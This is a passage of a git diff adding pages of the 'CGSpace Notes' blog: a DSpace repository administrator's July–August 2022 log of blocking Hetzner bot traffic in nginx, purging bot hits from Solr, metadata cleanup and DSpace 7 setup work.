+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> /var/log/nginx/<span style="color:#f92672">{</span>access,library-access<span style="color:#f92672">}</span>.log | sort | grep 2a01:4f9 | uniq -c | sort -h
+</span></span><span style="display:flex;"><span>      1 2a01:4f9:6a:1c2b::2
+</span></span><span style="display:flex;"><span>      2 2a01:4f9:2b:5a8::2
+</span></span><span style="display:flex;"><span>      2 2a01:4f9:4b:4495::2
+</span></span><span style="display:flex;"><span>     96 2a01:4f9:c010:518c::1
+</span></span><span style="display:flex;"><span>    137 2a01:4f9:c010:a9bc::1
+</span></span><span style="display:flex;"><span>    142 2a01:4f9:c010:58c9::1
+</span></span><span style="display:flex;"><span>    142 2a01:4f9:c010:58ea::1
+</span></span><span style="display:flex;"><span>    144 2a01:4f9:c010:58eb::1
+</span></span><span style="display:flex;"><span>    145 2a01:4f9:c010:6ff8::1
+</span></span><span style="display:flex;"><span>    148 2a01:4f9:c010:5190::1
+</span></span><span style="display:flex;"><span>    149 2a01:4f9:c010:7d6d::1
+</span></span><span style="display:flex;"><span>    153 2a01:4f9:c010:5226::1
+</span></span><span style="display:flex;"><span>    156 2a01:4f9:c010:7f74::1
+</span></span><span style="display:flex;"><span>    160 2a01:4f9:c010:5188::1
+</span></span><span style="display:flex;"><span>    161 2a01:4f9:c010:58e5::1
+</span></span><span style="display:flex;"><span>    168 2a01:4f9:c010:58ed::1
+</span></span><span style="display:flex;"><span>    170 2a01:4f9:c010:548e::1
+</span></span><span style="display:flex;"><span>    170 2a01:4f9:c010:8c97::1
+</span></span><span style="display:flex;"><span>    175 2a01:4f9:c010:58c8::1
+</span></span><span style="display:flex;"><span>    175 2a01:4f9:c010:aada::1
+</span></span><span style="display:flex;"><span>    182 2a01:4f9:c010:58ec::1
+</span></span><span style="display:flex;"><span>    182 2a01:4f9:c010:ae8c::1
+</span></span><span style="display:flex;"><span>    502 2a01:4f9:c010:ee57::1
+</span></span><span style="display:flex;"><span>    530 2a01:4f9:c011:567a::1
+</span></span><span style="display:flex;"><span>    535 2a01:4f9:c010:d04e::1
+</span></span><span style="display:flex;"><span>    539 2a01:4f9:c010:3d9a::1
+</span></span><span style="display:flex;"><span>    586 2a01:4f9:c010:93db::1
+</span></span><span style="display:flex;"><span>    593 2a01:4f9:c010:a04a::1
+</span></span><span style="display:flex;"><span>    601 2a01:4f9:c011:4166::1
+</span></span><span style="display:flex;"><span>    607 2a01:4f9:c010:9881::1
+</span></span><span style="display:flex;"><span>    640 2a01:4f9:c010:87fb::1
+</span></span><span style="display:flex;"><span>    648 2a01:4f9:c010:e680::1
+</span></span><span style="display:flex;"><span>   1141 2a01:4f9:3a:2696::2
+</span></span><span style="display:flex;"><span>   1146 2a01:4f9:3a:2555::2
+</span></span><span style="display:flex;"><span>   3207 2a01:4f9:3a:2c19::2
+</span></span></code></pre></div><ul>
+<li>Maybe it&rsquo;s time I ban all of Hetzner&hellip; sheesh.</li>
+<li>I left for a few hours and the server was going up and down the whole time, still very high CPU and database when I got back</li>
+</ul>
+<p><img src="/cgspace-notes/2022/07/cpu-day.png" alt="CPU day"></p>
+<ul>
+<li>I am not sure what&rsquo;s going on
+<ul>
+<li>I extracted all the IPs and used <code>resolve-addresses-geoip2.py</code> to analyze them and extract all the Hetzner networks and block them</li>
+<li>It&rsquo;s 181 IPs on Hetzner&hellip;</li>
+</ul>
+</li>
+<li>I rebooted the server to see if it was just some stuck locks in PostgreSQL&hellip;</li>
+<li>The load is still higher than I would expect, and after a few more hours I see more Hetzner IPs coming through? Two more subnets to block</li>
+<li>Start a harvest on AReS</li>
+</ul>
+<h2 id="2022-07-12">2022-07-12</h2>
+<ul>
+<li>Update an incorrect ORCID identifier for Alliance</li>
+<li>Adjust collection permissions on CIFOR publications collection so Vika can submit without approval</li>
+</ul>
+<h2 id="2022-07-14">2022-07-14</h2>
+<ul>
+<li>Someone on the DSpace Slack mentioned having issues with the database configuration in DSpace 7.3
+<ul>
+<li>The reason is apparently that the default <code>db.dialect</code> changed from &ldquo;org.dspace.storage.rdbms.hibernate.postgres.DSpacePostgreSQL82Dialect&rdquo; to &ldquo;org.hibernate.dialect.PostgreSQL94Dialect&rdquo; as a result of a Hibernate update</li>
+</ul>
+</li>
+<li>Then I was getting more errors starting the backend server in Tomcat, but the issue was that the backend server needs Solr to be up first!</li>
+</ul>
+<h2 id="2022-07-17">2022-07-17</h2>
+<ul>
+<li>Start a harvest on AReS around 3:30PM</li>
+<li>Later in the evening I see CGSpace was going down and up (not as bad as last Sunday) with around 18.0 load&hellip;</li>
+<li>I see very high CPU usage:</li>
+</ul>
+<p><img src="/cgspace-notes/2022/07/cpu-day2.png" alt="CPU day"></p>
+<ul>
+<li>But DSpace sessions are normal (not like last weekend):</li>
+</ul>
+<p><img src="/cgspace-notes/2022/07/jmx_dspace_sessions-week2.png" alt="DSpace sessions week"></p>
+<ul>
+<li>I see some Hetzner IPs in the top users today, but most of the requests are getting HTTP 503 because of the changes I made last week</li>
+<li>I see 137.184.159.211, which is on Digital Ocean, and the DNS is apparently iitawpsite.iita.org
+<ul>
+<li>I&rsquo;ve seen their user agent before, but I don&rsquo;t think I knew it was IITA: &ldquo;GuzzleHttp/6.3.3 curl/7.84.0 PHP/7.4.30&rdquo;</li>
+<li>I already have something in nginx to mark Guzzle as a bot, but interestingly it shows up in Solr as <code>$http_user_agent</code> so there is a logic error in my nginx config</li>
+</ul>
+</li>
+<li>Ouch, the logic error seems to be this:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>geo $ua {
+</span></span><span style="display:flex;"><span>    default          $http_user_agent;
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>    include /etc/nginx/bot-networks.conf;
+</span></span><span style="display:flex;"><span>}
+</span></span></code></pre></div><ul>
+<li>After some testing on DSpace Test I see that this is actually setting the default user agent to a literal <code>$http_user_agent</code></li>
+<li>The <a href="http://nginx.org/en/docs/http/ngx_http_map_module.html">nginx map docs</a> say:</li>
+</ul>
+<blockquote>
+<p>The resulting value can contain text, variable (0.9.0), and their combination (1.11.0).</p>
+</blockquote>
+<ul>
+<li>But I can&rsquo;t get it to work, neither for the default value or for matching my IP&hellip;
+<ul>
+<li>I will have to ask on the nginx mailing list</li>
+</ul>
+</li>
+<li>The total number of requests and unique hosts was not even very high (below here around midnight so is almost all day):</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> /var/log/nginx/<span style="color:#f92672">{</span>access,library-access,oai,rest<span style="color:#f92672">}</span>.log | sort -u | wc -l
+</span></span><span style="display:flex;"><span>2776
+</span></span><span style="display:flex;"><span># awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> /var/log/nginx/<span style="color:#f92672">{</span>access,library-access,oai,rest<span style="color:#f92672">}</span>.log | wc -l
+</span></span><span style="display:flex;"><span>40325
+</span></span></code></pre></div><h2 id="2022-07-18">2022-07-18</h2>
+<ul>
+<li>Reading more about nginx&rsquo;s geo/map and doing some tests on DSpace Test, it appears that the <a href="https://stackoverflow.com/questions/47011497/nginx-geo-module-wont-use-variables">geo module cannot do dynamic values</a>
+<ul>
+<li>So this issue with the literal <code>$http_user_agent</code> is due to the geo block I put in place earlier this month</li>
+<li>I reworked the logic so that the geo block sets &ldquo;bot&rdquo; or and empty string when a network matches or not, and then re-use that value in a mapping that passes through the host&rsquo;s user agent in case geo has set it to an empty string</li>
+<li>This allows me to accomplish the original goal while still only using one bot-networks.conf file for the <code>limit_req_zone</code> and the user agent mapping that we pass to Tomcat</li>
+<li>Unfortunately this means I will have hundreds of thousands of requests in Solr with a literal <code>$http_user_agent</code></li>
+<li>I might try to purge some by enumerating all the networks in my block file and running them through <code>check-spider-ip-hits.sh</code></li>
+</ul>
+</li>
+<li>I extracted all the IPs/subnets from <code>bot-networks.conf</code> and prepared them so I could enumerate their IPs
+<ul>
+<li>I had to add <code>/32</code> to all single IPs, which I did with this crazy vim invocation:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>:g!/\/\d\+$/s/^\(\d\+\.\d\+\.\d\+\.\d\+\)$/\1\/32/
+</span></span></code></pre></div><ul>
+<li>Explanation:
+<ul>
+<li><code>g!</code>: global, lines <em>not</em> matching (the opposite of <code>g</code>)</li>
+<li><code>/\/\d\+$/</code>, pattern matching <code>/</code> with one or more digits at the end of the line</li>
+<li><code>s/^\(\d\+\.\d\+\.\d\+\.\d\+\)$/\1\/32/</code>, for lines not matching above, capture the IPv4 address and add <code>/32</code> at the end</li>
+</ul>
+</li>
+<li>Then I ran the list through prips to enumerate the IPs:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ <span style="color:#66d9ef">while</span> read -r line; <span style="color:#66d9ef">do</span> prips <span style="color:#e6db74">&#34;</span>$line<span style="color:#e6db74">&#34;</span> | sed -e <span style="color:#e6db74">&#39;1d; $d&#39;</span>; <span style="color:#66d9ef">done</span> &lt; /tmp/bot-networks.conf &gt; /tmp/bot-ips.txt
+</span></span><span style="display:flex;"><span>$ wc -l /tmp/bot-ips.txt                                                                                        
+</span></span><span style="display:flex;"><span>1946968 /tmp/bot-ips.txt
+</span></span></code></pre></div><ul>
+<li>I started running <code>check-spider-ip-hits.sh</code> with the 1946968 IPs and left it running in dry run mode</li>
+</ul>
+<h2 id="2022-07-19">2022-07-19</h2>
+<ul>
+<li>Patrizio and Fabio emailed me to ask if their IP was banned from CGSpace
+<ul>
+<li>It&rsquo;s one of the Hetzner ones so I said yes definitely, and asked more about how they are using the API</li>
+</ul>
+</li>
+<li>Add ORCID identifer for Ram Dhulipala, Lilian Wambua, and Dan Masiga to CGSpace and tag them and some other existing items:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>dc.contributor.author,cg.creator.identifier
+</span></span><span style="display:flex;"><span>&#34;Dhulipala, Ram K&#34;,&#34;Ram Dhulipala: 0000-0002-9720-3247&#34;
+</span></span><span style="display:flex;"><span>&#34;Dhulipala, Ram&#34;,&#34;Ram Dhulipala: 0000-0002-9720-3247&#34;
+</span></span><span style="display:flex;"><span>&#34;Dhulipala, R.&#34;,&#34;Ram Dhulipala: 0000-0002-9720-3247&#34;
+</span></span><span style="display:flex;"><span>&#34;Wambua, Lillian&#34;,&#34;Lillian Wambua: 0000-0003-3632-7411&#34;
+</span></span><span style="display:flex;"><span>&#34;Wambua, Lilian&#34;,&#34;Lillian Wambua: 0000-0003-3632-7411&#34;
+</span></span><span style="display:flex;"><span>&#34;Masiga, D.K.&#34;,&#34;Daniel Masiga: 0000-0001-7513-0887&#34;
+</span></span><span style="display:flex;"><span>&#34;Masiga, Daniel K.&#34;,&#34;Daniel Masiga: 0000-0001-7513-0887&#34;
+</span></span><span style="display:flex;"><span>&#34;Jores, Joerg&#34;,&#34;Joerg Jores: 0000-0003-3790-5746&#34;
+</span></span><span style="display:flex;"><span>&#34;Schieck, Elise&#34;,&#34;Elise Schieck: 0000-0003-1756-6337&#34;
+</span></span><span style="display:flex;"><span>&#34;Schieck, Elise G.&#34;,&#34;Elise Schieck: 0000-0003-1756-6337&#34;
+</span></span><span style="display:flex;"><span>$ ./ilri/add-orcid-identifiers-csv.py -i /tmp/2022-07-19-add-orcids.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span>
+</span></span></code></pre></div><ul>
+<li>Review the AfricaRice records from earlier this month again
+<ul>
+<li>I found one more duplicate and one more suspicious item, so the total after removing those is now forty-two</li>
+</ul>
+</li>
+<li>I took all the ~560 IPs that had hits so far in <code>check-spider-ip-hits.sh</code> above (about 270,000 into the list of 1946968 above) and ran them directly on CGSpace
+<ul>
+<li>This purged 199,032 hits from Solr, very many of which were from Qualys, but also that Chinese bot on 124.17.34.0/24 that was grabbing PDFs a few years ago which I blocked in nginx, but never purged the hits from</li>
+<li>Then I deleted all IPs up to the last one where I found hits in the large file of 1946968 IPs and re-started the script</li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-07-20">2022-07-20</h2>
+<ul>
+<li>Did a few more minor edits to the forty-two AfricaRice records (including generating thumbnails for the handful that are Creative Commons licensed) then did a test import on my local instance
+<ul>
+<li>Once it worked well I did an import to CGSpace:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ dspace import -a -e fuuu@example.com -m 2022-07-20-africarice.map -s /tmp/SimpleArchiveFormat
+</span></span></code></pre></div><ul>
+<li>Also make edits to ~62 affiliations on CGSpace because I noticed they were messed up</li>
+<li>Extract another ~1,600 IPs that had hits since I started the second round of <code>check-spider-ip-hits.sh</code> yesterday and purge another 303,594 hits
+<ul>
+<li>This is about 999846 into the original list of 1946968 from yesterday</li>
+<li>A metric fuck ton of the IPs in this batch were from Hetzner</li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-07-21">2022-07-21</h2>
+<ul>
+<li>Extract another ~2,100 IPs that had hits since I started the third round of <code>check-spider-ip-hits.sh</code> last night and purge another 763,843 hits
+<ul>
+<li>This is about 1441221 into the original list of 1946968 from two days ago</li>
+<li>Again these are overwhelmingly Hetzner (not surprising since my bot-networks.conf file in nginx is mostly Hetzner)</li>
+</ul>
+</li>
+<li>I responded to my original request to Atmire about the log4j to reload4j migration in DSpace 6.4
+<ul>
+<li>I had initially requested a comment from them in 2022-05</li>
+</ul>
+</li>
+<li>Extract another ~1,200 IPs that had hits from the fourth round of <code>check-spider-ip-hits.sh</code> earlier today and purge another 74,591 hits
+<ul>
+<li>Now the list of IPs I enumerated from the nginx <code>bot-networks.conf</code> is finished</li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-07-22">2022-07-22</h2>
+<ul>
+<li>I created a new Linode instance for testing DSpace 7</li>
+<li>Jose from the CCAFS team sent me the final versions of 3,500+ Innovations, Policies, MELIAs, and OICRs from MARLO</li>
+<li>I re-synced CGSpace with DSpace Test so I can have a newer snapshot of the production data there for testing the CCAFS MELIAs, OICRs, Policies, and Innovations</li>
+<li>I re-created the tip-submit and tip-approve DSpace user accounts for Alliance&rsquo;s new TIP submit tool and added them to the Alliance submitters and Alliance admins accounts respectively</li>
+<li>Start working on updating the Ansible infrastructure playbooks for DSpace 7 stuff</li>
+</ul>
+<h2 id="2022-07-23">2022-07-23</h2>
+<ul>
+<li>Start a harvest on AReS</li>
+<li>More work on DSpace 7 related issues in the <a href="https://github.com/ilri/rmg-ansible-public">Ansible infrastructure playbooks</a></li>
+</ul>
+<h2 id="2022-07-24">2022-07-24</h2>
+<ul>
+<li>More work on DSpace 7 related issues in the <a href="https://github.com/ilri/rmg-ansible-public">Ansible infrastructure playbooks</a></li>
+</ul>
+<h2 id="2022-07-25">2022-07-25</h2>
+<ul>
+<li>More work on DSpace 7 related issues in the <a href="https://github.com/ilri/rmg-ansible-public">Ansible infrastructure playbooks</a>
+<ul>
+<li>I see that, for Solr, we will need to copy the DSpace configsets to the writable data directory rather than the default home dir</li>
+<li>The <a href="https://solr.apache.org/guide/8_11/taking-solr-to-production.html">Taking Solr to production guide</a> recommends keeping the unzipped code separate from the data, which we do in our Solr role already</li>
+<li>So that means we keep the unzipped code in <code>/opt/solr-8.11.2</code>, but the data directory in <code>/var/solr/data</code>, with the DSpace Solr cores here <code>/var/solr/data/configsets</code></li>
+<li>I&rsquo;m not sure how to integrate that into my playbooks yet</li>
+</ul>
+</li>
+<li>Much to my surprise, Discovery indexing on DSpace 7 was really fast when I did it just now, apparently taking 40 minutes of wall clock time?!:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ /usr/bin/time -v /home/dspace7/bin/dspace index-discovery -b
+</span></span><span style="display:flex;"><span>The script has started
+</span></span><span style="display:flex;"><span>(Re)building index from scratch.
+</span></span><span style="display:flex;"><span>Done with indexing
+</span></span><span style="display:flex;"><span>The script has completed
+</span></span><span style="display:flex;"><span>        Command being timed: &#34;/home/dspace7/bin/dspace index-discovery -b&#34;
+</span></span><span style="display:flex;"><span>        User time (seconds): 588.18
+</span></span><span style="display:flex;"><span>        System time (seconds): 91.26
+</span></span><span style="display:flex;"><span>        Percent of CPU this job got: 28%
+</span></span><span style="display:flex;"><span>        Elapsed (wall clock) time (h:mm:ss or m:ss): 40:05.79
+</span></span><span style="display:flex;"><span>        Average shared text size (kbytes): 0
+</span></span><span style="display:flex;"><span>        Average unshared data size (kbytes): 0
+</span></span><span style="display:flex;"><span>        Average stack size (kbytes): 0
+</span></span><span style="display:flex;"><span>        Average total size (kbytes): 0
+</span></span><span style="display:flex;"><span>        Maximum resident set size (kbytes): 635380
+</span></span><span style="display:flex;"><span>        Average resident set size (kbytes): 0
+</span></span><span style="display:flex;"><span>        Major (requiring I/O) page faults: 1513
+</span></span><span style="display:flex;"><span>        Minor (reclaiming a frame) page faults: 216412
+</span></span><span style="display:flex;"><span>        Voluntary context switches: 1671092
+</span></span><span style="display:flex;"><span>        Involuntary context switches: 744007
+</span></span><span style="display:flex;"><span>        Swaps: 0
+</span></span><span style="display:flex;"><span>        File system inputs: 4396880
+</span></span><span style="display:flex;"><span>        File system outputs: 74312
+</span></span><span style="display:flex;"><span>        Socket messages sent: 0
+</span></span><span style="display:flex;"><span>        Socket messages received: 0
+</span></span><span style="display:flex;"><span>        Signals delivered: 0
+</span></span><span style="display:flex;"><span>        Page size (bytes): 4096
+</span></span><span style="display:flex;"><span>        Exit status: 0
+</span></span></code></pre></div><ul>
+<li>Leroy from the Alliance wrote to say that the CIAT Library is back up so I might be able to download all the PDFs
+<ul>
+<li>It had been shut down for a security reason a few months ago and we were planning to download them all and attach them to their relevant items on CGSpace</li>
+<li>I noticed one item that had the PDF already on CGSpace so I&rsquo;ll need to consider that when I eventually do the import</li>
+</ul>
+</li>
+<li>I had to re-create the tip-submit and tip-approve accounts for Alliance on DSpace Test again
+<ul>
+<li>After I created them last week they somehow got deleted&hellip;?!&hellip; I couldn&rsquo;t find them or the mel-submit account either!</li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-07-26">2022-07-26</h2>
+<ul>
+<li>Rafael from Alliance wrote to say that the tip-submit account wasn&rsquo;t working on DSpace Test
+<ul>
+<li>I think I need to have the submit account in the <em>Alliance admin</em> group in order for it to be able to submit via the REST API, but yesterday I had added it to the submitters group</li>
+</ul>
+</li>
+<li>Meeting with Peter and Abenet about CGSpace issues
+<ul>
+<li>We want to do a training with IFPRI ASAP</li>
+<li>Then we want to start bringing the comms people from the Initiatives in</li>
+<li>We also want to revive the Metadata Working Group to have discussions about metadata standards, governance, etc</li>
+<li>We walked through DSpace 7.3 to get an idea of what vanilla looks like and start thinking about UI, item display, etc (perhaps we solicit help from some CG centers on Angular?)</li>
+</ul>
+</li>
+<li>Start looking at the metadata for the 1,637 Innovations that Jose sent last week
+<ul>
+<li>There are still issues with the citation formatting, but I will just fix it instead of asking him again</li>
+<li>I can use these GREL to fix the spacing around &ldquo;Annual Report2017&rdquo; and the periods:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>value.replace(/Annual Report(\d{4})/, &#34;Annual Report $1&#34;)
+</span></span><span style="display:flex;"><span>value.replace(/ \./, &#34;.&#34;)
+</span></span></code></pre></div><ul>
+<li>Then there are also some other issues with the metadata that I sent to him for comments</li>
+<li>I managed to get DSpace 7 running behind nginx, and figured out how to change the logo to CGIAR and run a local instance using the remote API</li>
+</ul>
+<h2 id="2022-07-27">2022-07-27</h2>
+<ul>
+<li>Work on the MARLO Innovations and MELIA
+<ul>
+<li>I had to ask Jose for some clarifications and correct some encoding issues (for example in Côte d&rsquo;Ivoire all over the place, and weird periods everywhere)</li>
+</ul>
+</li>
+<li>Work on the DSpace 7.3 theme, mimicking CGSpace&rsquo;s DSpace 6 them pretty well for now</li>
+</ul>
+<h2 id="2022-07-28">2022-07-28</h2>
+<ul>
+<li>Work on the MARLO Innovations
+<ul>
+<li>I had to ask Jose more questions about character encoding and duplicates</li>
+</ul>
+</li>
+<li>I added a new feature to <a href="https://github.com/ilri/csv-metadata-quality">csv-metadata-quality</a> to add missing regions to the region column when it is detected that there is a country with missing regions</li>
+</ul>
+<h2 id="2022-07-30">2022-07-30</h2>
+<ul>
+<li>Start a full harvest on AReS</li>
+</ul>
+<!-- raw HTML omitted -->
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2022-08/index.html b/docs/2022-08/index.html
new file mode 100644
index 000000000..905b0b66b
--- /dev/null
+++ b/docs/2022-08/index.html
@@ -0,0 +1,576 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="August, 2022" />
+<meta property="og:description" content="2022-08-01
+
+Our request to add CC-BY-3.0-IGO to SPDX was approved a few weeks ago
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2022-08/" />
+<meta property="article:published_time" content="2022-08-01T10:22:36+03:00" />
+<meta property="article:modified_time" content="2023-02-22T11:59:48+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="August, 2022"/>
+<meta name="twitter:description" content="2022-08-01
+
+Our request to add CC-BY-3.0-IGO to SPDX was approved a few weeks ago
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "August, 2022",
+  "url": "https://alanorth.github.io/cgspace-notes/2022-08/",
+  "wordCount": "2704",
+  "datePublished": "2022-08-01T10:22:36+03:00",
+  "dateModified": "2023-02-22T11:59:48+03:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2022-08/">
+
+    <title>August, 2022 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2022-08/">August, 2022</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2022-08-01T10:22:36+03:00">Mon Aug 01, 2022</time>
+ in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2022-08-01">2022-08-01</h2>
+<ul>
+<li>Our request to add <a href="https://github.com/spdx/license-list-XML/issues/1525">CC-BY-3.0-IGO to SPDX</a> was approved a few weeks ago</li>
+</ul>
+<h2 id="2022-08-02">2022-08-02</h2>
+<ul>
+<li>Resume working on the MARLO Innovations
+<ul>
+<li>Last week Jose had sent me an updated CSV with UTF-8 formatting, which was missing the filename column</li>
+<li>I joined it with the older file (stripped down to just the <code>cg.number</code> and <code>filename</code> columns and then did the same cleanups I had done last week</li>
+<li>I noticed there are six PDFs unused, so I asked Jose</li>
+</ul>
+</li>
+<li>Spent some time trying to understand the REST API submission issues that Rafael from CIAT is having with tip-approve and tip-submit
+<ul>
+<li>First, according to my notes in 2020-10, a user must be a <em>collection admin</em> in order to submit via the REST API</li>
+<li>Second, a collection must have a &ldquo;Accept/Reject/Edit Metadata&rdquo; step defined in the workflow</li>
+<li>Also, I referenced my notes from this gist I had made for exactly this purpose! <a href="https://gist.github.com/alanorth/40fc3092aefd78f978cca00e8abeeb7a">https://gist.github.com/alanorth/40fc3092aefd78f978cca00e8abeeb7a</a></li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-08-03">2022-08-03</h2>
+<ul>
+<li>I came up with an interesting idea to add missing countries and AGROVOC terms to the MARLO Innovation metadata
+<ul>
+<li>I copied the abstract column to two new fields: <code>countrytest</code> and <code>agrovoctest</code> and then used this Jython code as a transform to drop terms that don&rsquo;t match (using CGSpace&rsquo;s country list and list of 1,400 AGROVOC terms):</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#66d9ef">with</span> open(<span style="color:#e6db74">r</span><span style="color:#e6db74">&#34;/tmp/cgspace-countries.txt&#34;</span>,<span style="color:#e6db74">&#39;r&#39;</span>) <span style="color:#66d9ef">as</span> f :
+</span></span><span style="display:flex;"><span>    countries <span style="color:#f92672">=</span> [name<span style="color:#f92672">.</span>rstrip()<span style="color:#f92672">.</span>lower() <span style="color:#66d9ef">for</span> name <span style="color:#f92672">in</span> f]
+</span></span><span style="display:flex;"><span>
+</span></span><span style="display:flex;"><span><span style="color:#66d9ef">return</span> <span style="color:#e6db74">&#34;||&#34;</span><span style="color:#f92672">.</span>join([x <span style="color:#66d9ef">for</span> x <span style="color:#f92672">in</span> value<span style="color:#f92672">.</span>split(<span style="color:#e6db74">&#39; &#39;</span>) <span style="color:#66d9ef">if</span> x<span style="color:#f92672">.</span>lower() <span style="color:#f92672">in</span> countries])
+</span></span></code></pre></div><ul>
+<li>Then I joined them with the other country and AGROVOC columns
+<ul>
+<li>I had originally tried to use csv-metadata-quality to look up and drop invalid AGROVOC terms but it was timing out ever dozen or so requests</li>
+<li>Then I briefly tried to use lightrdf to export a text file of labels from AGROVOC&rsquo;s RDF, but I couldn&rsquo;t figure it out</li>
+<li>I just realized this will not match countries with spaces in our cell value, ugh&hellip; and Jython has weird syntax and errors and I can&rsquo;t get normal Python code to work here, I&rsquo;m missing something</li>
+</ul>
+</li>
